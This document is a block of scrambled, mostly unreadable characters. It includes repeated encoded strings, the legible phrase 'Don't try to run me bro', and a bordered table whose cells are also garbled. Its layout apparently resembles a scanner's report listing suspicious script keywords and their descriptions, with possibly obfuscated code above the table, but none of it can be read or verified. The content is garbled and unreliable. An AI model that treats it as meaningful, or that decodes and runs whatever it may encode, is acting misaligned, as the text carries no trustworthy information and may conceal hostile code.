Ô·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼_^Õ§VM7PnjVãt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬Fã¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2Àã²ã¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À
Ô·µ¬¹u¬¯¨ttu¯©¿¦»ª¹½¦¢¨»¸¸¸ºr£r«µ¤¿¸¹µ«¿2¾¼µ®»¿¾ªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼_¥j7RV
eÅJãk9
rªrµº´©¤£¤À½¯ª¸¯u¦¤¢2¸®¼t¨¦¿¨Ôt°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ_GWVÅã,t°©¢¾¾Àµ¼£¹£»©¿©£¦µÔ¹¢µ¹·½2r¿·¼Ô¨º»À´¾«½r¢¢£°¨¤°ºÔ¦´¢ÀÔ¹¤¾½tÔ¸r¤µ»°°22¹¾©·¬·ª°¸°ÀÔ·µ¬¹u¬C
ejRV
ØRAp7oãªººt¦º2°¹¢¸Àt®»¹¿¯¾£º¦£Ôr´¼¦Ôr·´©À»¨´°¦¼®¬®«»·»¢¿¿u®«¾¢·t2½u¤½u2À¼«¼´ªtr¬¸®º¼¤¼¬uÔ2·«´À¤´½¨,"Don't try to run me bro"C
eÅJãk9
eÅJã^gs
3333333333333333333333333333333333333333333333333333333333333333333333333333333
+pÓãØÓ¥ÜGã^QVVB@_ÄjRã
nÅã9njV:ãÖÕÅQU@fRU¥dUÓÃÄQU@fWQU¥dUp@ÅAU@fBQn_ojRã3ãGNeãRB!VÕ0:ã'a+pÓa ÜG¶e¥Ma¥&Ü/+pÓ/^QVVB@'
3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã
,V0WB?ã0ÕÄ!7C
3333333333333333333333333333333333333333333333333333333333333333333333333333333
+pÓãØÓ¥ÜGã^QVVBd_ÄjRã
nÅã9njV:ãÖÕÅQU@fRU¥dUÓÃÄQU@fWQU¥dUp@ÅAU@fBQn_ojRã3ãGNeãRB!VÕ0:ã'a+pÓa ÜG¶e¥Ma¥&Ü/+pÓ/^QVVBd'
3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã3ã
,V0WB?ã0ÕÄ!7C
²3333333333²33333333333333333333²333333333333333333333333333333333333333333333²
ZM?WVããããããZÛV?H7!JãããããããããããããZÖVRÄ!nWBn7ÅããããããããããããããããããããããããããããããããããZ
²3333333333²33333333333333333333²333333333333333333333333333333333333333333333²
ZÓgB7eoVÄããZÓgB7GWVÅããããããããããããZÜgÅRãHQVÅãBQVã¡7!JãJ7Äg0VÅBãnRã7WVÅVJããããããããZ
ZÓgB7eoVÄããZÖ7Äg0VÅBGWVÅããããããããZÜgÅRãHQVÅãBQVã¡7!JãJ7Äg0VÅBãnRã7WVÅVJããããããããZ
ZÓgB7eoVÄããZÖ7Äg0VÅBaGWVÅãããããããZÜgÅRãHQVÅãBQVã¡7!Jã7!ã gsjnRQV!ãJ7Äg0VÅBãnRããZ
ZããããããããããZããããããããããããããããããããZ7WVÅVJãããããããããããããããããããããããããããããããããããããããZ
ZÓgB7eoVÄããZÓgB7aGWVÅãããããããããããZÜgÅRãHQVÅãBQVãeoÄVjã¡7!bs77bãnRã7WVÅVJãããããããZ
ZÓgB7eoVÄããZ¡7!bs77baGWVÅãããããããZÜgÅRãHQVÅãBQVãeoÄVjã¡7!bs77bãnRã7WVÅVJãããããããZ
Z^gRWnÄn7gRZGWVÅããããããããããããããããZØÕ?ã7WVÅãÕã9njVããããããããããããããããããããããããããããããZ
Z^gRWnÄn7gRZ¡!nBVãããããããããããããããZØÕ?ãH!nBVãB7ãÕã9njVã,n9ãÄ70snÅVJãHnBQãGWVÅCããZ
Z^gRWnÄn7gRZÕJ7Js_RB!VÕ0ããããããããZØÕ?ãÄ!VÕBVãÕãBVoBã9njVãããããããããããããããããããããããZ
Z^gRWnÄn7gRZ^Õ§VM7PnjVããããããããããZØÕ?ãÄ!VÕBVãÕãBVoBã9njVãããããããããããããããããããããããZ
Z^gRWnÄn7gRZ^QVjjãããããããããããããããZØÕ?ã!gÅãÕÅãVoVÄgBÕsjVã9njVã7!ãÕãR?RBV0ãããããããZ
ZããããããããããZããããããããããããããããããããZÄ700ÕÅJããããããããããããããããããããããããããããããããããããããZ
Z^gRWnÄn7gRZ¡^Ä!nWB_^QVjjãããããããZØÕ?ã!gÅãÕÅãVoVÄgBÕsjVã9njVã7!ãÕãR?RBV0ãããããããZ
ZããããããããããZããããããããããããããããããããZÄ700ÕÅJããããããããããããããããããããããããããããããããããããããZ
Z^gRWnÄn7gRZ¥!VÕBVGsvVÄBããããããããZØÕ?ãÄ!VÕBVãÕÅãGNeã7svVÄBãããããããããããããããããããããZ
Z^gRWnÄn7gRZ^QVjj_ÓWWjnÄÕBn7ÅãããZØÕ?ã!gÅãÕÅãÕWWjnÄÕBn7Åã,n9ãÄ70snÅVJãHnBQãããããZ
ZããããããããããZããããããããããããããããããããZ¥!VÕBVGsvVÄBCããããããããããããããããããããããããããããããããZ
Z^gRWnÄn7gRZ0nÄ!7R79B_o0jQBBWãããZØÕ?ãJ7HÅj7ÕJã9njVRã9!70ãBQVãkÅBV!ÅVBãããããããããZ
Z^gRWnÄn7gRZ¥Q!ãããããããããããããããããZØÕ?ãÕBBV0WBãB7ã7s9gRÄÕBVãRWVÄn9nÄãRB!nÅARããããZ
ZããããããããããZããããããããããããããããããããZ,gRVã7WBn7Åã33JV7s9ãB7ãJV7s9gRÄÕBVCããããããããããZ
Z^gRWnÄn7gRZzVoã^B!nÅARãããããããããZzVo3VÅÄ7JVJãRB!nÅARãHV!VãJVBVÄBVJFã0Õ?ãsVããããZ
ZããããããããããZããããããããããããããããããããZgRVJãB7ã7s9gRÄÕBVãRB!nÅARã,7WBn7Åã33JVÄ7JVãB7Z
ZããããããããããZããããããããããããããããããããZRVVãÕjjCãããããããããããããããããããããããããããããããããããããZ
²3333333333²33333333333333333333²333333333333333333333333333333333333333333333²

